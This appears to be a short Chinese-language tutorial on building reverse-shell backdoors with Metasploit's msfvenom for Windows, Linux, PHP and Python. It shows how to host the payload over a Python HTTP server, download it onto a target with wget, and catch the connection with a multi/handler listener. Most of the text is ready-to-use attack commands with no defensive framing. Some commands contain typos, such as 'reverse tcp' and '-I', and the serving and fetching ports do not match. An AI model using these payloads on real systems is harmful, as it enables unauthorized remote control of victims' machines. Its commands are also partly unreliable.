msfvenom
使用msfvenom软件生成木马后门,在目标机上执行后门,在本地机上监听上线。
小提示:maf即是metasploit,venom即是病毒
如果不知道msfvenom怎么用,可以msfvenom -h查看,四种生成后门的命令:
windows可执行程序后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Linux可执行程序后门:msfvenom -p linux/x64/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
php脚本后门: msfvenom -p php/meterpreter/reverse tcp LHOST =<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
python脚本后门:msfvenom -p python/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
http.server
在本地机上生成后门后如何传入目标机器中呢?可以通过Python的http服务:
python3 -m http.server 8888
注意:如果不指定端口号,默认是8000端口
在windows中可以打开浏览器,输入:
172.17.17.128:8888
在linux中可使用wget获取,输入:
wget http://172.17.17.128:8000/shell.elf
目标机开启监听
use exploit/multi/handler
windows:set payload windows/x64/meterpreter/reverse_tcp,linux:set payload linux/x64/meterpreter/reverse_tcp
set lhost 172.17.17.128
set lport 4444
msfvenom查看
上面我们是针对windows来生成了一个木马后门,但是有时候我们不一定知道我们要生成的都有那些参数,比如说我们要攻击Android,我不知道要生成什么样的可执行文件,甚至我压根不知道payload要选什么,我怎么知道这个payload有这么几个参数要设置呢?那我们什么都不知道的情况下该如何查看我们所需要的内容,这时候msfvenom可以使用命令来进行查看:
查看msfvenom支持的格式:msfvenom -l formats
查看msfvenom支持的攻击载荷:msfvenom -I payloads 针对win:msfvenom -l payloads |grep windows
查看msfvenom支持的编码:msfvenom -l encoders
查看payload的信息与设置:msfvenom -p cmd/windows/adduser --list-options
